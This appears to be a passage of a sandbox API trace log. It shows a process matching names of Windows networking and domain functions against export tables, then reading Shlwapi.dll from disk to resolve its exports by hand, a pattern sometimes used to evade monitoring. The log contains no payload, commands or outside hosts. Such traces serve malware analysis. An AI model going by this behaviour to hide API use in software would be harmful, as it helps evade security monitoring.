[0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0272.276] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0272.277] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0272.278] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0272.279] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0272.280] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0272.280] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0272.281] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0272.282] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0272.283] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0272.283] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0272.284] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0272.284] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0272.284] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0272.284] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0272.284] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0272.284] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0272.284] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0272.284] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0272.289] GetProcessHeap () returned 0x400000 [0272.289] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c35030 | out: hHeap=0x400000) returned 1 [0272.289] GetProcessHeap () returned 0x400000 [0272.289] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x419160 [0272.289] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0272.290] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0272.290] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0272.291] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0272.291] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0272.291] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0272.292] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0272.292] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0272.292] GetProcessHeap () returned 0x400000 [0272.292] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x51148) returned 0x2c35030 [0272.292] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0272.292] ReadFile (in: hFile=0x17c, lpBuffer=0x2c35030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c35030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0272.297] CloseHandle (hObject=0x17c) returned 1 [0272.297] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0272.297] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0272.297] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0272.297] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0272.297] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0272.297] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0272.298] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0272.298] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0272.298] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0272.298] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0272.298] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0272.298] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0272.299] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0272.299] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0272.299] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0272.299] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0272.299] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0272.299] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0272.299] lstrcmpA 